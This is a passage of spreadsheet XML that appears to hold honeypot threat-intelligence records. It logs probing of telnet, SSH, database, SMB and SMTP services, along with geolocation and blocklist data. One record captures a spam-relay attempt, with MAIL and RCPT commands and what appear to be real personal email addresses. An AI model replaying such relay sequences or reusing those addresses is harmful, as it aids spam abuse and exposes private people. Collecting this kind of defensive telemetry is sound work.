    <s v="Tangará da Serra"/>
    <s v="6318738"/>
    <s v="NA"/>
    <s v="-14.6194"/>
    <s v="-57.4858"/>
    <s v="264268"/>
    <s v="TELETURBO SERVICOS DE TELECOMUNICACOES LTDA"/>
    <s v="Teleturbo Servicos De Telecomunicacoes Ltda"/>
    <s v="business"/>
    <s v="Teleturbo Servicos De Telecomunicacoes Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2015-02-26 00:00:00"/>
    <s v="2026-02-26 00:00:00"/>
    <s v="2022-11-07 00:00:00"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="['20250422 DSOK', 'published']"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bf07:7159"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="962"/>
    <x v="962"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T03:37:07"/>
    <d v="2025-04-23T14:16:10"/>
    <d v="2025-04-24T03:37:07"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d9:f241"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="963"/>
    <x v="963"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T03:29:44"/>
    <d v="2024-04-26T15:11:39"/>
    <d v="2025-04-24T03:29:44"/>
    <n v="22"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H1&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MSSQL_H36"/>
    <s v="22&amp;&amp;52724&amp;&amp;3306&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="61"/>
    <s v="Hải Dương Province"/>
    <s v="Cẩm Giàng District"/>
    <s v="Lai Cách"/>
    <s v="1577958"/>
    <s v="NA"/>
    <s v="20.9325"/>
    <s v="106.248"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="VIETEL"/>
    <s v="2011-03-04"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:abfb:5892"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="964"/>
    <x v="964"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T03:26:37"/>
    <d v="2025-03-25T14:46:35"/>
    <d v="2025-04-24T03:26:37"/>
    <n v="498"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H35"/>
    <s v="25&amp;&amp;NA&amp;&amp;58398"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']"/>
    <s v="AF"/>
    <s v="Africa"/>
    <s v="SC"/>
    <s v="Seychelles"/>
    <s v="16"/>
    <s v="La Rivière Anglaise"/>
    <s v="NA"/>
    <s v="Victoria"/>
    <s v="241131"/>
    <s v="NA"/>
    <s v="-4.62113"/>
    <s v="55.4522"/>
    <s v="401109"/>
    <s v="Zhongguancun LLC"/>
    <s v="Zhongguancun LLC"/>
    <s v="business"/>
    <s v="internet secuirty Zhongguanchun"/>
    <s v="2017-02-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;dr.mitra@ukrit.uk&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;nicolaswesley625@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;jonnalanford@mail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;w3593178@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;amandawhitmore11@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;harrygeorge_25@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;zainmazi@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;agbooladavis@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 25 Mar 2025 15:32:08 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 26 Mar 2025 05:50:55 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 30 Mar 2025 16:08:34 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 1 Apr 2025 09:20:54 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 2 Apr 2025 09:05:19 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Fri, 4 Apr 2025 19:40:10 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 5 Apr 2025 04:33:24 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 5 Apr 2025 11:35:08 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 5 Apr 2025 17:41:21 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 5 Apr 2025 20:48:39 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 6 Apr 2025 21:43:45 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '156.244.8.69_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 7 Apr 2025 17:42:22 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 10 Apr 2025 08:42:49 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 10 Apr 2025 12:01:39 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 13 Apr 2025 10:19:56 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@seanjtucker.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;info@stricklissy.de&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 14 Apr 2025 06:06:49 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 15 Apr 2025 10:45:13 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 15 Apr 2025 17:36:20 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 15 Apr 2025 19:46:40 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 16 Apr 2025 07:06:46 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.234.67.80_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 16 Apr 2025 21:33:07 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;woonleslie@post.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 22 Apr 2025 04:36:19 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c4fb:5c5b"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low&amp;&amp;Medium&amp;&amp;High"/>
    <s v="The attacker is trying to scan and gather information about various systems, protocols, and services on the network. They are attempting to identify potential vulnerabilities and exploit them for malicious purposes. &amp;&amp;  &amp;&amp; A malicious actor has attempted to use an SMTP service but instead of sending or receiving messages, they initiated a connection and sent a QUIT command, which is typically used for legitimate connections, suggesting they were trying to establish a connection without actually intending to send email. This behavior is indicative of reconnaissance or probing activities. The lack of actual data being sent suggests the actor was likely testing the service's presence."/>
    <s v="**Port Scanning** &amp;&amp; "/>
  </r>
  <r>
    <x v="965"/>
    <x v="965"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T03:15:24"/>
    <d v="2025-04-24T03:15:24"/>
    <d v="2025-04-24T03:15:24"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ff:1e2a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="966"/>
    <x v="966"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T02:19:32"/>
    <d v="2025-04-24T02:19:32"/>
    <d v="2025-04-24T02:19:32"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:8704"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="967"/>
    <x v="967"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T00:41:52"/>
    <d v="2025-04-24T00:41:52"/>
    <d v="2025-04-24T00:41:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:4182"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="968"/>
    <x v="968"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T00:41:29"/>
    <d v="2025-04-24T00:41:29"/>
    <d v="2025-04-24T00:41:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:dbd7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="969"/>
    <x v="969"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T00:39:34"/>
    <d v="2025-04-24T00:39:14"/>
    <d v="2025-04-24T00:39:34"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main (Innenstadt I)"/>
    <s v="2925533"/>
    <s v="60326"/>
    <s v="50.0987"/>
    <s v="8.63226"/>
    <s v="39351"/>
    <s v="31173 Services AB"/>
    <s v="31173 Services AB"/>
    <s v="hosting"/>
    <s v="31173 Services Germany"/>
    <s v="2017-06-22"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9d1:c496"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="970"/>
    <x v="970"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-24T00:25:23"/>
    <d v="2024-12-29T01:49:10"/>
    <d v="2025-04-24T00:25:23"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:882e"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="971"/>
    <x v="971"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T23:42:00"/>
    <d v="2025-04-23T23:42:00"/>
    <d v="2025-04-23T23:42:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}"/>
    <n v="77"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:113f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="972"/>
    <x v="972"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-23T23:32:29"/>
    <d v="2025-04-23T23:32:29"/>
    <d v="2025-04-23T23:32:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
